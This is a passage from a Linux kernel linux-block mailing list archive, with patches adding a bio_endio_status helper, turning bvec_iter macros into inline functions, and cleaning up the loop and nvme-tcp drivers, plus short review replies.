>   			disk->fops->submit_bio(bio);
> -		}
>   		blk_queue_exit(disk->queue);
>   	}
>   
> @@ -886,8 +884,7 @@ void submit_bio_noacct(struct bio *bio)
>   not_supported:
>   	status = BLK_STS_NOTSUPP;
>   end_io:
> -	bio->bi_status = status;
> -	bio_endio(bio);
> +	bio_endio_status(bio, status);
>   }
>   EXPORT_SYMBOL(submit_bio_noacct);
>   
> diff --git a/block/blk-crypto-fallback.c b/block/blk-crypto-fallback.c
> index 61f595410832..8b04d9205b8d 100644
> --- a/block/blk-crypto-fallback.c
> +++ b/block/blk-crypto-fallback.c
> @@ -361,8 +361,7 @@ static void blk_crypto_fallback_encrypt_bio(struct bio *src_bio)
>   	status = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
>   					bc->bc_key, &slot);
>   	if (status != BLK_STS_OK) {
> -		src_bio->bi_status = status;
> -		bio_endio(src_bio);
> +		bio_endio_status(src_bio, status);
>   		return;
>   	}
>   	__blk_crypto_fallback_encrypt_bio(src_bio,
> @@ -437,8 +436,7 @@ static void blk_crypto_fallback_decrypt_bio(struct work_struct *work)
>   	}
>   	mempool_free(f_ctx, bio_fallback_crypt_ctx_pool);
>   
> -	bio->bi_status = status;
> -	bio_endio(bio);
> +	bio_endio_status(bio, status);
>   }
>   
>   /**
> @@ -499,8 +497,7 @@ bool blk_crypto_fallback_bio_prep(struct bio *bio)
>   
>   	if (!__blk_crypto_cfg_supported(blk_crypto_fallback_profile,
>   					&bc->bc_key->crypto_cfg)) {
> -		bio->bi_status = BLK_STS_NOTSUPP;
> -		bio_endio(bio);
> +		bio_endio_status(bio, BLK_STS_NOTSUPP);
>   		return false;
>   	}
>   
> diff --git a/block/blk-crypto.c b/block/blk-crypto.c
> index 856d3c5b1fa0..165c9d2cce07 100644
> --- a/block/blk-crypto.c
> +++ b/block/blk-crypto.c
> @@ -267,8 +267,7 @@ bool __blk_crypto_submit_bio(struct bio *bio)
>   		if (!IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK)) {
>   			pr_warn_once("%pg: crypto API fallback disabled; failing request.\n",
>   				bdev);
> -			bio->bi_status = BLK_STS_NOTSUPP;
> -			bio_endio(bio);
> +			bio_endio_status(bio, BLK_STS_NOTSUPP);
>   			return false;
>   		}
>   		return blk_crypto_fallback_bio_prep(bio);
> diff --git a/block/blk-merge.c b/block/blk-merge.c
> index fcf09325b22e..7cc82a7a6f4e 100644
> --- a/block/blk-merge.c
> +++ b/block/blk-merge.c
> @@ -122,8 +122,7 @@ struct bio *bio_submit_split_bioset(struct bio *bio, unsigned int split_sectors,
>   	struct bio *split = bio_split(bio, split_sectors, GFP_NOIO, bs);
>   
>   	if (IS_ERR(split)) {
> -		bio->bi_status = errno_to_blk_status(PTR_ERR(split));
> -		bio_endio(bio);
> +		bio_endio_status(bio, errno_to_blk_status(PTR_ERR(split)));
>   		return NULL;
>   	}
>   
> @@ -143,8 +142,7 @@ EXPORT_SYMBOL_GPL(bio_submit_split_bioset);
>   static struct bio *bio_submit_split(struct bio *bio, int split_sectors)
>   {
>   	if (unlikely(split_sectors < 0)) {
> -		bio->bi_status = errno_to_blk_status(split_sectors);
> -		bio_endio(bio);
> +		bio_endio_status(bio, errno_to_blk_status(split_sectors));
>   		return NULL;
>   	}
>   
> diff --git a/block/blk-mq.c b/block/blk-mq.c
> index 4c5c16cce4f8..ade9d3a89743 100644
> --- a/block/blk-mq.c
> +++ b/block/blk-mq.c
> @@ -3187,8 +3187,7 @@ void blk_mq_submit_bio(struct bio *bio)
>   	}
>   
>   	if ((bio->bi_opf & REQ_POLLED) && !blk_mq_can_poll(q)) {
> -		bio->bi_status = BLK_STS_NOTSUPP;
> -		bio_endio(bio);
> +		bio_endio_status(bio, BLK_STS_NOTSUPP);
>   		goto queue_exit;
>   	}
>   
> @@ -3229,8 +3228,7 @@ void blk_mq_submit_bio(struct bio *bio)
>   
>   	ret = blk_crypto_rq_get_keyslot(rq);
>   	if (ret != BLK_STS_OK) {
> -		bio->bi_status = ret;
> -		bio_endio(bio);
> +		bio_endio_status(bio, ret);
>   		blk_mq_free_request(rq);
>   		return;
>   	}
> diff --git a/block/fops.c b/block/fops.c
> index ffe7b2042f4e..15783a6180de 100644
> --- a/block/fops.c
> +++ b/block/fops.c
> @@ -218,8 +218,7 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
>   
>   		ret = blkdev_iov_iter_get_pages(bio, iter, bdev);
>   		if (unlikely(ret)) {
> -			bio->bi_status = BLK_STS_IOERR;
> -			bio_endio(bio);
> +			bio_endio_status(bio, BLK_STS_IOERR);
>   			break;
>   		}
>   		if (iocb->ki_flags & IOCB_NOWAIT) {
> diff --git a/include/linux/bio.h b/include/linux/bio.h
> index 7597ae4dc52b..d778e65fdacd 100644
> --- a/include/linux/bio.h
> +++ b/include/linux/bio.h
> @@ -371,16 +371,27 @@ void submit_bio(struct bio *bio);
>   
>   extern void bio_endio(struct bio *);
>   
> -static inline void bio_io_error(struct bio *bio)
> +/**
> + * bio_endio - end I/O on a bio with a specific status
> + * @bio:	bio
> + * @status:	status to set
> + *
> + * Set @bio->bi_status to @status and call bio_endio().
> + **/
> +static inline void bio_endio_status(struct bio *bio, blk_status_t status)
>   {
> -	bio->bi_status = BLK_STS_IOERR;
> +	bio->bi_status = status;
>   	bio_endio(bio);
>   }
>   
> +static inline void bio_io_error(struct bio *bio)
> +{
> +	bio_endio_status(bio, BLK_STS_IOERR);
> +}
> +
>   static inline void bio_wouldblock_error(struct bio *bio)
>   {
> -	bio->bi_status = BLK_STS_AGAIN;
> -	bio_endio(bio);
> +	bio_endio_status(bio, BLK_STS_AGAIN);
>   }
>   
>   /*


^ permalink raw reply

* Re: [PATCH] block: mark biovec_init_pool static
From: Bart Van Assche @ 2026-05-27 15:33 UTC (permalink / raw)
  To: Christoph Hellwig, axboe; +Cc: linux-block
In-Reply-To: <20260527150646.2349405-1-hch@lst.de>

On 5/27/26 8:06 AM, Christoph Hellwig wrote:
> Signed-off-by: Christoph Hellwig <hch@lst.de>
> ---
>   block/bio.c         | 2 +-
>   include/linux/bio.h | 1 -
>   2 files changed, 1 insertion(+), 2 deletions(-)
> 
> diff --git a/block/bio.c b/block/bio.c
> index 2d880d1255fe..e9944dab0132 100644
> --- a/block/bio.c
> +++ b/block/bio.c
> @@ -1873,7 +1873,7 @@ EXPORT_SYMBOL_GPL(bio_trim);
>    * create memory pools for biovec's in a bio_set.
>    * use the global biovec slabs created for general use.
>    */
> -int biovec_init_pool(mempool_t *pool, int pool_entries)
> +static int biovec_init_pool(mempool_t *pool, int pool_entries)
>   {
>   	struct biovec_slab *bp = bvec_slabs + ARRAY_SIZE(bvec_slabs) - 1;
>   
> diff --git a/include/linux/bio.h b/include/linux/bio.h
> index 7597ae4dc52b..e60d2f5bd3dc 100644
> --- a/include/linux/bio.h
> +++ b/include/linux/bio.h
> @@ -347,7 +347,6 @@ enum {
>   };
>   extern int bioset_init(struct bio_set *, unsigned int, unsigned int, int flags);
>   extern void bioset_exit(struct bio_set *);
> -extern int biovec_init_pool(mempool_t *pool, int pool_entries);
>   
>   struct bio *bio_alloc_bioset(struct block_device *bdev, unsigned short nr_vecs,
>   			     blk_opf_t opf, gfp_t gfp, struct bio_set *bs);

Reviewed-by: Bart Van Assche <bvanassche@acm.org>

^ permalink raw reply

* Re: [PATCH] block: add a bio_endio_status helper
From: Keith Busch @ 2026-05-27 15:27 UTC (permalink / raw)
  To: Christoph Hellwig; +Cc: axboe, linux-block
In-Reply-To: <20260527151247.2352145-1-hch@lst.de>

On Wed, May 27, 2026 at 05:12:47PM +0200, Christoph Hellwig wrote:
> Add a helper that sets bi_status and call bio_endio() as that is a very
> common pattern and convert the core block code over to it.

Thanks, this looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* Re: [PATCH 3/3] bvec: make the bvec_iter helpers inline functions
From: Keith Busch @ 2026-05-27 15:21 UTC (permalink / raw)
  To: Christoph Hellwig
  Cc: Jens Axboe, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-4-hch@lst.de>

On Wed, May 27, 2026 at 05:10:22PM +0200, Christoph Hellwig wrote:
> The macros are impossible to follow due to the lack of visual type
> information and all the braces.  Replace them with inline helpers to
> improve on that.  Because the calling conventions are a bit problematic
> with a lot of passing structures by value, all the helpers are marked
> as __always_inline so that they are force inlined.

Looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* Re: [PATCH 2/3] nvme-tcp: cleanup nvme_tcp_init_iter
From: Keith Busch @ 2026-05-27 15:20 UTC (permalink / raw)
  To: Christoph Hellwig
  Cc: Jens Axboe, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-3-hch@lst.de>

On Wed, May 27, 2026 at 05:10:21PM +0200, Christoph Hellwig wrote:
> Split the two init cases based on code in the zloop driver.  This
> simplifies the code and makes it easier to follow.

Looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* Re: [PATCH 1/3] loop: cleanup lo_rw_aio
From: Keith Busch @ 2026-05-27 15:20 UTC (permalink / raw)
  To: Christoph Hellwig
  Cc: Jens Axboe, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-2-hch@lst.de>

On Wed, May 27, 2026 at 05:10:20PM +0200, Christoph Hellwig wrote:
> Port over the changes from the zloop driver to remove the need for
> the local bio, bvec and offset variables and clean up the code by
> that.

Looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* [PATCH] block: add a bio_endio_status helper
From: Christoph Hellwig @ 2026-05-27 15:12 UTC (permalink / raw)
  To: axboe; +Cc: linux-block

Add a helper that sets bi_status and call bio_endio() as that is a very
common pattern and convert the core block code over to it.

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 block/blk-core.c            | 11 ++++-------
 block/blk-crypto-fallback.c |  9 +++------
 block/blk-crypto.c          |  3 +--
 block/blk-merge.c           |  6 ++----
 block/blk-mq.c              |  6 ++----
 block/fops.c                |  3 +--
 include/linux/bio.h         | 19 +++++++++++++++----
 7 files changed, 28 insertions(+), 29 deletions(-)

diff --git a/block/blk-core.c b/block/blk-core.c
index 22af5dec112b..b0f0a304ea0b 100644
--- a/block/blk-core.c
+++ b/block/blk-core.c
@@ -636,12 +636,10 @@ static void __submit_bio(struct bio *bio)
 		struct gendisk *disk = bio->bi_bdev->bd_disk;
 	
 		if ((bio->bi_opf & REQ_POLLED) &&
-		    !(disk->queue->limits.features & BLK_FEAT_POLL)) {
-			bio->bi_status = BLK_STS_NOTSUPP;
-			bio_endio(bio);
-		} else {
+		    !(disk->queue->limits.features & BLK_FEAT_POLL))
+			bio_endio_status(bio, BLK_STS_NOTSUPP);
+		else
 			disk->fops->submit_bio(bio);
-		}
 		blk_queue_exit(disk->queue);
 	}
 
@@ -886,8 +884,7 @@ void submit_bio_noacct(struct bio *bio)
 not_supported:
 	status = BLK_STS_NOTSUPP;
 end_io:
-	bio->bi_status = status;
-	bio_endio(bio);
+	bio_endio_status(bio, status);
 }
 EXPORT_SYMBOL(submit_bio_noacct);
 
diff --git a/block/blk-crypto-fallback.c b/block/blk-crypto-fallback.c
index 61f595410832..8b04d9205b8d 100644
--- a/block/blk-crypto-fallback.c
+++ b/block/blk-crypto-fallback.c
@@ -361,8 +361,7 @@ static void blk_crypto_fallback_encrypt_bio(struct bio *src_bio)
 	status = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
 					bc->bc_key, &slot);
 	if (status != BLK_STS_OK) {
-		src_bio->bi_status = status;
-		bio_endio(src_bio);
+		bio_endio_status(src_bio, status);
 		return;
 	}
 	__blk_crypto_fallback_encrypt_bio(src_bio,
@@ -437,8 +436,7 @@ static void blk_crypto_fallback_decrypt_bio(struct work_struct *work)
 	}
 	mempool_free(f_ctx, bio_fallback_crypt_ctx_pool);
 
-	bio->bi_status = status;
-	bio_endio(bio);
+	bio_endio_status(bio, status);
 }
 
 /**
@@ -499,8 +497,7 @@ bool blk_crypto_fallback_bio_prep(struct bio *bio)
 
 	if (!__blk_crypto_cfg_supported(blk_crypto_fallback_profile,
 					&bc->bc_key->crypto_cfg)) {
-		bio->bi_status = BLK_STS_NOTSUPP;
-		bio_endio(bio);
+		bio_endio_status(bio, BLK_STS_NOTSUPP);
 		return false;
 	}
 
diff --git a/block/blk-crypto.c b/block/blk-crypto.c
index 856d3c5b1fa0..165c9d2cce07 100644
--- a/block/blk-crypto.c
+++ b/block/blk-crypto.c
@@ -267,8 +267,7 @@ bool __blk_crypto_submit_bio(struct bio *bio)
 		if (!IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK)) {
 			pr_warn_once("%pg: crypto API fallback disabled; failing request.\n",
 				bdev);
-			bio->bi_status = BLK_STS_NOTSUPP;
-			bio_endio(bio);
+			bio_endio_status(bio, BLK_STS_NOTSUPP);
 			return false;
 		}
 		return blk_crypto_fallback_bio_prep(bio);
diff --git a/block/blk-merge.c b/block/blk-merge.c
index fcf09325b22e..7cc82a7a6f4e 100644
--- a/block/blk-merge.c
+++ b/block/blk-merge.c
@@ -122,8 +122,7 @@ struct bio *bio_submit_split_bioset(struct bio *bio, unsigned int split_sectors,
 	struct bio *split = bio_split(bio, split_sectors, GFP_NOIO, bs);
 
 	if (IS_ERR(split)) {
-		bio->bi_status = errno_to_blk_status(PTR_ERR(split));
-		bio_endio(bio);
+		bio_endio_status(bio, errno_to_blk_status(PTR_ERR(split)));
 		return NULL;
 	}
 
@@ -143,8 +142,7 @@ EXPORT_SYMBOL_GPL(bio_submit_split_bioset);
 static struct bio *bio_submit_split(struct bio *bio, int split_sectors)
 {
 	if (unlikely(split_sectors < 0)) {
-		bio->bi_status = errno_to_blk_status(split_sectors);
-		bio_endio(bio);
+		bio_endio_status(bio, errno_to_blk_status(split_sectors));
 		return NULL;
 	}
 
diff --git a/block/blk-mq.c b/block/blk-mq.c
index 4c5c16cce4f8..ade9d3a89743 100644
--- a/block/blk-mq.c
+++ b/block/blk-mq.c
@@ -3187,8 +3187,7 @@ void blk_mq_submit_bio(struct bio *bio)
 	}
 
 	if ((bio->bi_opf & REQ_POLLED) && !blk_mq_can_poll(q)) {
-		bio->bi_status = BLK_STS_NOTSUPP;
-		bio_endio(bio);
+		bio_endio_status(bio, BLK_STS_NOTSUPP);
 		goto queue_exit;
 	}
 
@@ -3229,8 +3228,7 @@ void blk_mq_submit_bio(struct bio *bio)
 
 	ret = blk_crypto_rq_get_keyslot(rq);
 	if (ret != BLK_STS_OK) {
-		bio->bi_status = ret;
-		bio_endio(bio);
+		bio_endio_status(bio, ret);
 		blk_mq_free_request(rq);
 		return;
 	}
diff --git a/block/fops.c b/block/fops.c
index ffe7b2042f4e..15783a6180de 100644
--- a/block/fops.c
+++ b/block/fops.c
@@ -218,8 +218,7 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
 
 		ret = blkdev_iov_iter_get_pages(bio, iter, bdev);
 		if (unlikely(ret)) {
-			bio->bi_status = BLK_STS_IOERR;
-			bio_endio(bio);
+			bio_endio_status(bio, BLK_STS_IOERR);
 			break;
 		}
 		if (iocb->ki_flags & IOCB_NOWAIT) {
diff --git a/include/linux/bio.h b/include/linux/bio.h
index 7597ae4dc52b..d778e65fdacd 100644
--- a/include/linux/bio.h
+++ b/include/linux/bio.h
@@ -371,16 +371,27 @@ void submit_bio(struct bio *bio);
 
 extern void bio_endio(struct bio *);
 
-static inline void bio_io_error(struct bio *bio)
+/**
+ * bio_endio - end I/O on a bio with a specific status
+ * @bio:	bio
+ * @status:	status to set
+ *
+ * Set @bio->bi_status to @status and call bio_endio().
+ **/
+static inline void bio_endio_status(struct bio *bio, blk_status_t status)
 {
-	bio->bi_status = BLK_STS_IOERR;
+	bio->bi_status = status;
 	bio_endio(bio);
 }
 
+static inline void bio_io_error(struct bio *bio)
+{
+	bio_endio_status(bio, BLK_STS_IOERR);
+}
+
 static inline void bio_wouldblock_error(struct bio *bio)
 {
-	bio->bi_status = BLK_STS_AGAIN;
-	bio_endio(bio);
+	bio_endio_status(bio, BLK_STS_AGAIN);
 }
 
 /*
-- 
2.53.0


^ permalink raw reply related

* [PATCH 3/3] bvec: make the bvec_iter helpers inline functions
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-1-hch@lst.de>

The macros are impossible to follow due to the lack of visual type
information and all the braces.  Replace them with inline helpers to
improve on that.  Because the calling conventions are a bit problematic
with a lot of passing structures by value, all the helpers are marked
as __always_inline so that they are force inlined.

Signed-off-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Bart Van Assche <bvanassche@acm.org>
Reviewed-by: Caleb Sander Mateos <csander@purestorage.com>
---
 include/linux/bvec.h | 101 +++++++++++++++++++++++++++----------------
 1 file changed, 64 insertions(+), 37 deletions(-)

diff --git a/include/linux/bvec.h b/include/linux/bvec.h
index d36dd476feda..f4c7ec282ac9 100644
--- a/include/linux/bvec.h
+++ b/include/linux/bvec.h
@@ -104,51 +104,78 @@ struct bvec_iter_all {
 	unsigned	done;
 };
 
-/*
- * various member access, note that bio_data should of course not be used
- * on highmem page vectors
- */
-#define __bvec_iter_bvec(bvec, iter)	(&(bvec)[(iter).bi_idx])
+static __always_inline const struct bio_vec *
+__bvec_iter_bvec(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return bvecs + iter.bi_idx;
+}
 
 /* multi-page (mp_bvec) helpers */
-#define mp_bvec_iter_page(bvec, iter)				\
-	(__bvec_iter_bvec((bvec), (iter))->bv_page)
+static __always_inline struct page *
+mp_bvec_iter_page(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return __bvec_iter_bvec(bvecs, iter)->bv_page;
+}
 
-#define mp_bvec_iter_len(bvec, iter)				\
-	min((iter).bi_size,					\
-	    __bvec_iter_bvec((bvec), (iter))->bv_len - (iter).bi_bvec_done)
+static __always_inline unsigned int
+mp_bvec_iter_len(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return min(__bvec_iter_bvec(bvecs, iter)->bv_len - iter.bi_bvec_done,
+			iter.bi_size);
+}
 
-#define mp_bvec_iter_offset(bvec, iter)				\
-	(__bvec_iter_bvec((bvec), (iter))->bv_offset + (iter).bi_bvec_done)
+static __always_inline unsigned int
+mp_bvec_iter_offset(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return __bvec_iter_bvec(bvecs, iter)->bv_offset + iter.bi_bvec_done;
+}
 
-#define mp_bvec_iter_page_idx(bvec, iter)			\
-	(mp_bvec_iter_offset((bvec), (iter)) / PAGE_SIZE)
+static __always_inline unsigned int
+mp_bvec_iter_page_idx(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return mp_bvec_iter_offset(bvecs, iter) / PAGE_SIZE;
+}
 
-#define mp_bvec_iter_bvec(bvec, iter)				\
-((struct bio_vec) {						\
-	.bv_page	= mp_bvec_iter_page((bvec), (iter)),	\
-	.bv_len		= mp_bvec_iter_len((bvec), (iter)),	\
-	.bv_offset	= mp_bvec_iter_offset((bvec), (iter)),	\
-})
+static __always_inline struct bio_vec
+mp_bvec_iter_bvec(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return (struct bio_vec) {
+		.bv_page	= mp_bvec_iter_page(bvecs, iter),
+		.bv_len		= mp_bvec_iter_len(bvecs, iter),
+		.bv_offset	= mp_bvec_iter_offset(bvecs, iter),
+	};
+}
 
 /* For building single-page bvec in flight */
- #define bvec_iter_offset(bvec, iter)				\
-	(mp_bvec_iter_offset((bvec), (iter)) % PAGE_SIZE)
-
-#define bvec_iter_len(bvec, iter)				\
-	min_t(unsigned, mp_bvec_iter_len((bvec), (iter)),		\
-	      PAGE_SIZE - bvec_iter_offset((bvec), (iter)))
-
-#define bvec_iter_page(bvec, iter)				\
-	(mp_bvec_iter_page((bvec), (iter)) +			\
-	 mp_bvec_iter_page_idx((bvec), (iter)))
-
-#define bvec_iter_bvec(bvec, iter)				\
-((struct bio_vec) {						\
-	.bv_page	= bvec_iter_page((bvec), (iter)),	\
-	.bv_len		= bvec_iter_len((bvec), (iter)),	\
-	.bv_offset	= bvec_iter_offset((bvec), (iter)),	\
-})
+static __always_inline unsigned int
+bvec_iter_offset(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return mp_bvec_iter_offset(bvecs, iter) % PAGE_SIZE;
+}
+
+static __always_inline unsigned int
+bvec_iter_len(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return min(mp_bvec_iter_len(bvecs, iter),
+			PAGE_SIZE - bvec_iter_offset(bvecs, iter));
+}
+
+static __always_inline struct page *
+bvec_iter_page(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return mp_bvec_iter_page(bvecs, iter) +
+		mp_bvec_iter_page_idx(bvecs, iter);
+}
+
+static __always_inline struct bio_vec
+bvec_iter_bvec(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return (struct bio_vec) {
+		.bv_page	= bvec_iter_page(bvecs, iter),
+		.bv_len		= bvec_iter_len(bvecs, iter),
+		.bv_offset	= bvec_iter_offset(bvecs, iter),
+	};
+}
 
 static inline bool bvec_iter_advance(const struct bio_vec *bv,
 		struct bvec_iter *iter, unsigned bytes)
-- 
2.53.0


^ permalink raw reply related

* [PATCH 2/3] nvme-tcp: cleanup nvme_tcp_init_iter
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-1-hch@lst.de>

Split the two init cases based on code in the zloop driver.  This
simplifies the code and makes it easier to follow.

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 drivers/nvme/host/tcp.c | 27 ++++++++++-----------------
 1 file changed, 10 insertions(+), 17 deletions(-)

diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
index 36b3ec50a9fd..9313ab211c67 100644
--- a/drivers/nvme/host/tcp.c
+++ b/drivers/nvme/host/tcp.c
@@ -340,32 +340,25 @@ static void nvme_tcp_init_iter(struct nvme_tcp_request *req,
 		unsigned int dir)
 {
 	struct request *rq = blk_mq_rq_from_pdu(req);
-	struct bio_vec *vec;
-	unsigned int size;
-	int nr_bvec;
-	size_t offset;
 
 	if (rq->rq_flags & RQF_SPECIAL_PAYLOAD) {
-		vec = &rq->special_vec;
-		nr_bvec = 1;
-		size = blk_rq_payload_bytes(rq);
-		offset = 0;
+		iov_iter_bvec(&req->iter, dir, &rq->special_vec, 1,
+				blk_rq_payload_bytes(rq));
+		req->iter.iov_offset = 0;
 	} else {
 		struct bio *bio = req->curr_bio;
 		struct bvec_iter bi;
 		struct bio_vec bv;
+		int nr_bvec = 0;
 
-		vec = __bvec_iter_bvec(bio->bi_io_vec, bio->bi_iter);
-		nr_bvec = 0;
-		bio_for_each_bvec(bv, bio, bi) {
+		bio_for_each_bvec(bv, bio, bi)
 			nr_bvec++;
-		}
-		size = bio->bi_iter.bi_size;
-		offset = bio->bi_iter.bi_bvec_done;
-	}
 
-	iov_iter_bvec(&req->iter, dir, vec, nr_bvec, size);
-	req->iter.iov_offset = offset;
+		iov_iter_bvec(&req->iter, dir,
+			__bvec_iter_bvec(bio->bi_io_vec, bio->bi_iter), nr_bvec,
+			bio->bi_iter.bi_size);
+		req->iter.iov_offset = bio->bi_iter.bi_bvec_done;
+	}
 }
 
 static inline void nvme_tcp_advance_req(struct nvme_tcp_request *req,
-- 
2.53.0


^ permalink raw reply related

* [PATCH 1/3] loop: cleanup lo_rw_aio
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-1-hch@lst.de>

Port over the changes from the zloop driver to remove the need for
the local bio, bvec and offset variables and clean up the code by
that.

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 drivers/block/loop.c | 24 ++++++++++--------------
 1 file changed, 10 insertions(+), 14 deletions(-)

diff --git a/drivers/block/loop.c b/drivers/block/loop.c
index 0000913f7efc..310de0463beb 100644
--- a/drivers/block/loop.c
+++ b/drivers/block/loop.c
@@ -342,23 +342,19 @@ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
 {
 	struct iov_iter iter;
 	struct req_iterator rq_iter;
-	struct bio_vec *bvec;
 	struct request *rq = blk_mq_rq_from_pdu(cmd);
-	struct bio *bio = rq->bio;
 	struct file *file = lo->lo_backing_file;
-	struct bio_vec tmp;
-	unsigned int offset;
 	unsigned int nr_bvec;
 	int ret;
 
 	nr_bvec = blk_rq_nr_bvec(rq);
 
 	if (rq->bio != rq->biotail) {
+		struct bio_vec tmp, *bvec;
 
-		bvec = kmalloc_objs(struct bio_vec, nr_bvec, GFP_NOIO);
-		if (!bvec)
+		cmd->bvec = kmalloc_objs(*cmd->bvec, nr_bvec, GFP_NOIO);
+		if (!cmd->bvec)
 			return -EIO;
-		cmd->bvec = bvec;
 
 		/*
 		 * The bios of the request may be started from the middle of
@@ -366,26 +362,26 @@ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
 		 * copy bio->bi_iov_vec to new bvec. The rq_for_each_bvec
 		 * API will take care of all details for us.
 		 */
+		bvec = cmd->bvec;
 		rq_for_each_bvec(tmp, rq, rq_iter) {
 			*bvec = tmp;
 			bvec++;
 		}
-		bvec = cmd->bvec;
-		offset = 0;
+		iov_iter_bvec(&iter, rw, cmd->bvec, nr_bvec, blk_rq_bytes(rq));
+		iter.iov_offset = 0;
 	} else {
 		/*
 		 * Same here, this bio may be started from the middle of the
 		 * 'bvec' because of bio splitting, so offset from the bvec
 		 * must be passed to iov iterator
 		 */
-		offset = bio->bi_iter.bi_bvec_done;
-		bvec = __bvec_iter_bvec(bio->bi_io_vec, bio->bi_iter);
+		iov_iter_bvec(&iter, rw,
+			__bvec_iter_bvec(rq->bio->bi_io_vec, rq->bio->bi_iter),
+			nr_bvec, blk_rq_bytes(rq));
+		iter.iov_offset = rq->bio->bi_iter.bi_bvec_done;
 	}
 	atomic_set(&cmd->ref, 2);
 
-	iov_iter_bvec(&iter, rw, bvec, nr_bvec, blk_rq_bytes(rq));
-	iter.iov_offset = offset;
-
 	cmd->iocb.ki_pos = pos;
 	cmd->iocb.ki_filp = file;
 	cmd->iocb.ki_ioprio = req_get_ioprio(rq);
-- 
2.53.0


^ permalink raw reply related

* clean up bvec iter helpers
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme

Hi all,

this series converts the bvec_iter helpers from macros to inline
functions, and to facilitate that cleans up a little bit of code
in the loop and nvme-tcp drivers first.

Diffstat:
 drivers/block/loop.c    |   24 ++++-------
 drivers/nvme/host/tcp.c |   27 ++++--------
 include/linux/bvec.h    |  101 ++++++++++++++++++++++++++++++------------------
 3 files changed, 84 insertions(+), 68 deletions(-)

^ permalink raw reply

* [PATCH] block: mark biovec_init_pool static
From: Christoph Hellwig @ 2026-05-27 15:06 UTC (permalink / raw)
  To: axboe; +Cc: linux-block

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 block/bio.c         | 2 +-
 include/linux/bio.h | 1 -
 2 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/block/bio.c b/block/bio.c
index 2d880d1255fe..e9944dab0132 100644
--- a/block/bio.c
+++ b/block/bio.c
@@ -1873,7 +1873,7 @@ EXPORT_SYMBOL_GPL(bio_trim);
  * create memory pools for biovec's in a bio_set.
  * use the global biovec slabs created for general use.
  */
-int biovec_init_pool(mempool_t *pool, int pool_entries)
+static int biovec_init_pool(mempool_t *pool, int pool_entries)
 {
 	struct biovec_slab *bp = bvec_slabs + ARRAY_SIZE(bvec_slabs) - 1;
 
diff --git a/include/linux/bio.h b/include/linux/bio.h
index 7597ae4dc52b..e60d2f5bd3dc 100644
--- a/include/linux/bio.h
+++ b/include/linux/bio.h
@@ -347,7 +347,6 @@ enum {
 };
 extern int bioset_init(struct bio_set *, unsigned int, unsigned int, int flags);
 extern void bioset_exit(struct bio_set *);
-extern int biovec_init_pool(mempool_t *pool, int pool_entries);
 
 struct bio *bio_alloc_bioset(struct block_device *bdev, unsigned short nr_vecs,
 			     blk_opf_t opf, gfp_t gfp, struct bio_set *bs);
-- 
2.53.0


^ permalink raw reply related

* Re: [PATCH] ublk: set canceling flag even when disk is not allocated
From: Jens Axboe @ 2026-05-27 15:03 UTC (permalink / raw)
  To: linux-block, Ming Lei; +Cc: Caleb Sander Mateos, Uday Shankar
In-Reply-To: <20260527144042.2095194-1-tom.leiming@gmail.com>


On Wed, 27 May 2026 09:40:42 -0500, Ming Lei wrote:
> ublk_start_cancel() previously bailed out early when ublk_get_disk()
> returned NULL, treating it as "our disk has been dead".  That is correct
> for the post-teardown case, but it also wrongly covers the pre-start
> case: ublk_ctrl_start_dev() has not assigned ub->ub_disk yet, while
> io_uring is already tearing down the daemon's uring_cmds via
